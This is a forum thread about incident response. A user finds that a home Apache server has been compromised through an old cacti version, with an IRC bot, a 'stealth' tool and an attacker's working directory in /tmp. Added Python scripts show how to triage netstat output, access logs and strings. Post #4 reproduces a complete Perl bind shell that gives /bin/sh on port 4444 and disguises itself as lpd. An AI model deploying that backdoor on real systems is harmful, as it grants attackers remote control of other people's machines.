  1. #1
    Join Date Jun 2002, Posts 1,378

    * Apache "stealth" process? What is it?

    Can someone tell me what just happened?

    Background: I run a Linux desktop, but it's also facing the net (port 8080) as a webserver. (For services, it's providing ssh, http, samba, amphetadesk, and webmin. I'm NAT'ed, though, so only port 8080 is actually facing the public.)

    All of a sudden I couldn't get anywhere online, so I started investigating. While looking at network stats, I happened to notice one of my CPUs was spiked at full usage.

    top revealed a process known as "stealth" -- owned by user apache -- at 100% CPU usage.

    Anyone know what this is? Or where it came from? Unless they were really good (somehow breaching the router, getting into the LAN, and attacking me from there), the only port anyone could see was 8080, running Apache, so, assuming this was some exploit, that's how they got in.

    I'm going to poke through the logs to see if I can find anything. But has anyone seen this before that can offer some help?

  2. #2
    Code:
    # netstat --inet -W
    Active Internet connections (w/o servers)
    Proto Recv-Q Send-Q Local Address           Foreign Address         State      
    tcp      510      0 localhost:http          localhost:52749         CLOSE_WAIT  
    tcp      288      0 dehimifier:webcache     lj2517.inktomisearch.com:57759 CLOSE_WAIT  
    tcp      191      0 dehimifier:webcache     lj2536.inktomisearch.com:47502 CLOSE_WAIT  
    tcp        0      1 dehimifier:32822        mblk-d28.mblk.aol.com:ircd SYN_SENT    
    tcp        0      0 dehimifier:54685        oam-d10a.blue.aol.com:5190 TIME_WAIT   
    tcp       95      0 localhost:http          localhost:59978         CLOSE_WAIT  
    tcp        0      0 dehimifier:57204        caim-d04b.blue.aol.com:5190 TIME_WAIT   
    tcp        0      0 dehimifier:45874        64.12.25.20:5190        TIME_WAIT
    (dehimifier is my hostname)

    The blue.aol.com is my AIM connection; I signed off right before running it, which apparently put them in CLOSE_WAIT. I'm not sure what's going on with the ircd port. I don't really use IRC.

    I ran this the first time, note the IRC connection to another host:

    Code:
    # netstat --inet
    Active Internet connections (w/o servers)
    Proto Recv-Q Send-Q Local Address           Foreign Address         State      
    tcp      510      0 localhost:http          localhost:52749         CLOSE_WAIT  
    tcp      288      0 dehimifier:webcache     lj2517.inktomisea:57759 CLOSE_WAIT  
    tcp      191      0 dehimifier:webcache     lj2536.inktomisea:47502 CLOSE_WAIT  
    tcp        0      1 dehimifier:32821        sodium.mlink.net:ircd   SYN_SENT    
    tcp        0      0 dehimifier:54685        oam-d10a.blue.aol.:5190 ESTABLISHED 
    tcp       95      0 localhost:http          localhost:59978         CLOSE_WAIT  
    tcp        0      0 dehimifier:57204        caim-d04b.blue.aol:5190 ESTABLISHED 
    tcp        0      0 dehimifier:45874        64.12.25.20:5190        ESTABLISHED 
    tcp        0      0 localhost:52749         localhost:http          FIN_WAIT2   
    tcp        0      0 localhost:59978         localhost:http          FIN_WAIT2

  3. #3
    Methinks someone's gotten in. I stopped Apache, but port 80 and 8080 (and 443) are still open. Playing with netstat options some more:

    Code:
    # netstat --inet -W -e -e
    Active Internet connections (w/o servers)
    Proto Recv-Q Send-Q Local Address           Foreign Address         State       User       Inode     
    tcp      510      0 localhost:http          localhost:52749         CLOSE_WAIT  root       0          
    tcp        0      0 localhost:40460         localhost:webcache      ESTABLISHED n1zyy      2162851    
    tcp      288      0 dehimifier:webcache     lj2517.inktomisearch.com:57759 CLOSE_WAIT  root       0          
    tcp      191      0 dehimifier:webcache     lj2536.inktomisearch.com:47502 CLOSE_WAIT  root       0          
    tcp      514      0 localhost:webcache      localhost:40460         ESTABLISHED root       0          
    tcp       95      0 localhost:http          localhost:59978         CLOSE_WAIT  root       0          
    tcp        0      0 dehimifier:32823        oslo2.no.eu.undernet.org:ircd ESTABLISHED apache     2162790
    Note that I've got a new connection to Undernet, established. Also note that apache owns it.

    How do I stop an Apache process that isn't running?

    Edit: some more fun:

    Code:
    # ps aux | grep ^apache
    apache   27637  0.0  0.0   1316   324 ?        Ss   Jul10   0:00 bin/bsh
    apache   27697  0.0  0.1   1744   828 ?        Ss   Jul10   0:00 ./sendmail
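The triage in posts #2 and #3 comes down to one question: which sockets does the web service account own, and are any of them outbound? Here is that check as a script over the `netstat --inet -W -e -e` output above. It is an added example, not code from the thread: it parses only the eight-column TCP format shown (UDP lines print fewer columns and are skipped), the sample is that output trimmed, and the `SERVICE_ACCOUNTS`, `IRC_PORTS` and `WEB_PORTS` lists are assumptions.

```python
"""Triage `netstat --inet -W -e -e` output for sockets a web service account
should never own: outbound connections, and IRC in particular.

Added example, not code from the thread. Parses only the eight-column TCP
format shown in post #3; SAMPLE is that output, trimmed. The account and
port sets below are assumptions.
"""
from dataclasses import dataclass

SERVICE_ACCOUNTS = {"apache", "www-data", "httpd", "nobody", "guest"}
# netstat resolves ports through /etc/services, so both names and numbers appear.
IRC_PORTS = {"ircd", "irc", "6666", "6667", "6668", "6669", "6697", "7000"}
# Local service ports httpd legitimately binds; peers on these are inbound.
WEB_PORTS = {"http", "https", "webcache", "80", "443", "8080"}

SAMPLE = """\
Active Internet connections (w/o servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       User       Inode
tcp      510      0 localhost:http          localhost:52749         CLOSE_WAIT  root       0
tcp        0      0 localhost:40460         localhost:webcache      ESTABLISHED n1zyy      2162851
tcp      288      0 dehimifier:webcache     lj2517.inktomisearch.com:57759 CLOSE_WAIT  root       0
tcp        0      0 dehimifier:32823        oslo2.no.eu.undernet.org:ircd ESTABLISHED apache     2162790
"""


@dataclass
class Conn:
    proto: str
    local: str
    foreign: str
    state: str
    user: str
    inode: str

    def local_port(self) -> str:
        return self.local.rsplit(":", 1)[1]

    def foreign_port(self) -> str:
        return self.foreign.rsplit(":", 1)[1]

    def is_outbound(self) -> bool:
        # A numeric, non-service local port is ephemeral: this side initiated it.
        return self.local_port() not in WEB_PORTS and self.local_port().isdigit()


def parse_netstat(text: str) -> list:
    conns = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 8 or parts[0] not in {"tcp", "tcp6"}:
            continue  # banner, header, or a UDP line with a blank State column
        proto, _recvq, _sendq, local, foreign, state, user, inode = parts
        conns.append(Conn(proto, local, foreign, state, user, inode))
    return conns


def suspicious(conns: list) -> list:
    """Return (reason, conn) pairs for service-account sockets worth a look."""
    hits = []
    for c in conns:
        if c.user not in SERVICE_ACCOUNTS:
            continue
        if c.foreign_port() in IRC_PORTS:
            hits.append(("irc from service account", c))
        elif c.is_outbound():
            hits.append(("outbound from service account", c))
    return hits


if __name__ == "__main__":
    import sys
    text = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE
    for reason, c in suspicious(parse_netstat(text)):
        print(f"{reason}: {c.user} {c.local} -> {c.foreign} ({c.state}, inode {c.inode})")
```

Pipe live output in with `netstat --inet -W -e -e | python3 triage.py`. On the sample it flags exactly the Undernet socket. Bear in mind that on a box where the intruder has had a shell, `netstat` and `ps` themselves may have been replaced; read `/proc/net/tcp` directly, or better, take the disk off the host, before trusting the listing.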

  4. #4
    Looks like they were working out of /tmp.

    Some interesting entries:

    shell.pl
    Code:
    #!/usr/bin/perl
    # Bind shell: listens on TCP 4444 and hands every connection a /bin/sh
    use Socket;
    $port=4444;
    $proto=getprotobyname('tcp');
    $cmd="lpd";            # name the process will show under in ps
    $system='/bin/sh';
    $0=$cmd;               # overwrite argv[0] so the listener looks like the print daemon
    socket(SERVER, PF_INET, SOCK_STREAM, $proto) or die "socket:$!";
    setsockopt(SERVER, SOL_SOCKET, SO_REUSEADDR, pack("l", 1)) or die "setsockopt: $!";
    bind(SERVER, sockaddr_in($port, INADDR_ANY)) or die "bind: $!";   # on every interface
    listen(SERVER, SOMAXCONN) or die "listen: $!";
    for(;$paddr=accept(CLIENT, SERVER);close CLIENT) {
       # point the shell's stdin/stdout/stderr at the client socket
       open(STDIN, ">&CLIENT");
       open(STDOUT, ">&CLIENT");
       open(STDERR, ">&CLIENT");
       system($system);    # blocks until the remote operator exits the shell
       close(STDIN);
       close(STDOUT);
       close(STDERR);
    }
    Code:
    # cd bin && ls -l
    total 20
    -rwxr-xr-x  1 apache apache 19426 May 19 15:41 bsh
    Also:
    Code:
    # ls -l /tmp/cycomm/
    total 1270
    -rw-r--r--  1 apache apache   2156 Jul 10 09:31 Makefile
    -rwxr-xr-x  1 apache apache  20358 Jan  1  2003 configure
    drwxr-xr-x  4 apache apache    128 May 28  2004 contrib
    -rw-r--r--  1 apache apache  22465 Jun 13  2001 cyc.help
    -rw-r--r--  1 apache apache   1047 Jul 11 14:00 cyc.levels
    -rw-------  1 apache apache      6 Jul 10 22:45 cyc.pid
    -rw-r--r--  1 apache apache    768 Jul 11 14:00 cyc.session
    -rwxr-xr-x  1 apache apache   2354 Jul 10 21:23 cyc.set
    -rwxr-xr-x  1 apache apache 592978 Jul 10 18:30 cycmech
    -rw-r--r--  1 apache apache     72 Jul 11 14:00 emech.users
    -rwxr-xr-x  1 apache apache   4147 Jan 22  2002 genuser
    -rwxr-xr-x  1 apache apache  14306 Jul  5 19:31 proc
    drwxr-xr-x  2 apache apache    304 May 28  2004 randfiles
    -rwxr-xr-x  1 apache apache 592978 Jul 10 18:30 sendmail
    drwxr-xr-x  2 apache apache   1208 Jul 10 18:30 src
    -rwxr-xr-x  1 apache apache  13399 Jul  5 07:38 stealth
    In there is the "stealth" process I saw, as well as the "sendmail" that showed up on a ps. Now to come off the net and ensure they can't do any more.

  5. #5
    Okay, my apologies for the barrage of posts. I was sort of freaking out. As it's a desktop box, I have the luxury of just being able to pull it off the network and take my time. (I'm now on a laptop.)

    What I'm really interested in now is how they got in. I'd have expected it to be over ssh or something, but they really shouldn't have been able to. (Unless first getting into something else on the LAN here.)

    That "stealth" program is clearly no good:
    Code:
    # ./stealth -h
    
    twitch@Stealth:
    
    This tool is extremely dangerous. Use at your own risk!
    
    Usage: st-kill <host> <port>
    There's also a binary called sendmail, and the bin/bsh that they were running. "Reading" the binary of bin/bsh shows the string "You Have B4CKD0r3d this B0x....", along with references to things like memcpy, stdout, wapipid, strcopy, libc.so.6. (And tons of gibberish, since I'm looking at a binary file in vi.) Do you think (I can't find any information) that this is what was listening on port 80 / 8080 / 443? (I'd opened a telnet session to 80, but no matter what I typed, it didn't do anything.)

    Can anyone offer me help in tracking exactly how they got in?
    Last edited by fog; 07-11-2005 at 03:31 PM.

  6. #6
    Heh, think I found it. (Might I mention I'm suddenly glad I went with mod_log_sql? It's wonderful when you have to go searching.)

    Someone found me off of search.yahoo.com with a search phrase of "Please enter your cacti user name and password"

    It looks like older versions (<=0.8.6d) of cacti are vulnerable to remote command execution. Guess who's running 0.8.5a?
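The way the entry point turned up above, reading the Referer of a search-engine hit and decoding the search phrase, works just as well on plain access logs as on mod_log_sql. Below is an added example of that search, not code from the thread or from mod_log_sql: it parses Apache combined-format lines (the same fields mod_log_sql stores), flags requests whose referer is a search for login-page phrases, and then pulls the full request sequence from that client. The three log lines are constructed, and the search-engine host to query-parameter map is an assumption.

```python
"""Work backwards from the Referer to the request that brought an attacker in.

Added example, not code from the thread. Reads Apache combined-format lines;
SAMPLE_LOG is constructed and SEARCH_ENGINES is an assumption.
"""
import re
from urllib.parse import parse_qs, urlsplit

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Search engines and the query-string parameter that carries the search terms.
SEARCH_ENGINES = {"search.yahoo.com": "p", "www.google.com": "q", "www.bing.com": "q"}

# Words that make a search phrase look like a dork aimed at login pages.
DORK_WORDS = ("password", "login", "user name", "username", "admin")

SAMPLE_LOG = """\
203.0.113.7 - - [10/Jul/2005:09:14:02 -0400] "GET /cacti/ HTTP/1.1" 200 1843 "http://search.yahoo.com/search?p=%22Please+enter+your+cacti+user+name+and+password%22" "Mozilla/4.0"
203.0.113.7 - - [10/Jul/2005:09:14:31 -0400] "GET /cacti/graph_image.php?local_graph_id=8 HTTP/1.1" 200 812 "-" "Mozilla/4.0"
198.51.100.22 - - [10/Jul/2005:11:02:10 -0400] "GET /index.html HTTP/1.1" 200 5120 "http://www.google.com/search?q=dehimifier+blog" "Mozilla/5.0"
"""


def parse_log(text: str) -> list:
    """One dict per parseable combined-format line; unparseable lines are dropped."""
    rows = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            rows.append(m.groupdict())
    return rows


def search_terms(referer: str):
    """Return (engine host, decoded search phrase) if the referer is a search results page."""
    u = urlsplit(referer)
    param = SEARCH_ENGINES.get(u.hostname or "")
    if not param:
        return None
    vals = parse_qs(u.query).get(param)  # parse_qs undoes %XX and '+' encoding
    return (u.hostname, vals[0]) if vals else None


def dork_hits(rows: list) -> list:
    """Requests whose referer is a search for login/password-like phrases."""
    hits = []
    for r in rows:
        found = search_terms(r["referer"])
        if found and any(w in found[1].lower() for w in DORK_WORDS):
            hits.append({"ip": r["ip"], "path": r["path"], "engine": found[0], "query": found[1]})
    return hits


def session_for(rows: list, ip: str) -> list:
    """Every request from one client in log order: the attacker's walk through the app."""
    return [(r["time"], r["method"], r["path"], r["status"]) for r in rows if r["ip"] == ip]


if __name__ == "__main__":
    import sys
    rows = parse_log(sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_LOG)
    for h in dork_hits(rows):
        print(f'{h["ip"]} hit {h["path"]} via {h["engine"]} searching: {h["query"]}')
        for step in session_for(rows, h["ip"]):
            print("   ", *step)
```

Once the first hit is known, `session_for` gives the rest of that client's requests, which is where the actual exploit request against the vulnerable script will be; a request with an unusual query string, or a POST, to a cacti page right after the search referral is the one to look at.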

  7. #7
    Join Date Apr 2005, Location Sweden, Posts 241
    Geez, you needed a lot of help from here eh?

    Kidding, good work though. Next time you want to check out strings in a binary file there is the "strings" command (may or may not be installed) that can be easier than just looking through it with an editor.

    Typically if you see a box with a lot of junk in /tmp and not-so-carefully hidden processes, you can be almost sure it's a vulnerability in a php or cgi script somewhere.
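For the binaries in post #5 (bin/bsh, sendmail, stealth) and the `strings` tip in post #7, here is what `strings` does, plus a first-pass triage of its output so the "B4CKD0r3d" banner and IRC commands stand out without reading the whole dump. This is an added example, not code from the thread or from GNU binutils: it keeps runs of printable ASCII (tab, space, 0x21-0x7e) of at least `min_len` bytes, which is what `strings -n` reports on a raw scan, minus the object-file section handling. `BLOB` is a constructed stand-in for bin/bsh carrying the strings the poster saw, and the indicator patterns are assumptions.

```python
"""A `strings(1)` stand-in plus a first-pass triage of what it finds.

Added example, not code from the thread. BLOB is a constructed stand-in for
bin/bsh; the INDICATORS patterns are assumptions.
"""
import re
import sys

BLOB = (
    b"\x7fELF\x01\x01\x01\x00" + b"\x00" * 8          # ELF magic, then junk
    + b"memcpy\x00stdout\x00libc.so.6\x00"           # symbol-table style strings
    + b"\x01\x02abc\x03"                              # too short to be reported
    + b"You Have B4CKD0r3d this B0x....\x00"          # the banner from post #5
    + b"\xff\xfePRIVMSG #chan :hi\x00"                # an IRC command, typical of a bot
)

INDICATORS = {
    "backdoor banner": re.compile(r"b[4a]ckd[0o]+r", re.I),
    "irc protocol": re.compile(r"\b(PRIVMSG|NICK|JOIN|NOTICE)\b"),
    "shell": re.compile(r"/bin/(ba)?sh"),
    "dynamic libc": re.compile(r"libc\.so"),
}


def strings(data: bytes, min_len: int = 4):
    """Yield printable-ASCII runs of at least min_len bytes, like `strings -n`."""
    run = bytearray()
    for b in data:
        if b == 9 or 32 <= b <= 126:
            run.append(b)
            continue
        if len(run) >= min_len:
            yield run.decode("ascii")
        run = bytearray()
    if len(run) >= min_len:          # a run that ends at EOF
        yield run.decode("ascii")


def triage(data: bytes, min_len: int = 4) -> dict:
    """Map each indicator name to the extracted strings that match it (empty ones dropped)."""
    found = {name: [] for name in INDICATORS}
    for s in strings(data, min_len):
        for name, pat in INDICATORS.items():
            if pat.search(s):
                found[name].append(s)
    return {name: hits for name, hits in found.items() if hits}


if __name__ == "__main__":
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else BLOB
    for s in strings(data):
        print(s)
    for name, hits in triage(data).items():
        print(f"[{name}] " + " | ".join(hits))
```

Run it as `python3 strs.py /tmp/cycomm/bin/bsh` on a copy of the file taken from the unmounted disk; the indicator list is a starting point, and whatever hostnames, channel names or IP addresses fall out of the plain `strings` pass are what you feed back into the netstat and log searches.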

  8. #8
    This is May 4, 2011 and I have the same problem. I found your thread today with the same process running owning nearly 100% CPU. The only difference is that the owner of that process is guest instead of apache. I have Fedora 14, and all packages are up-to-date.
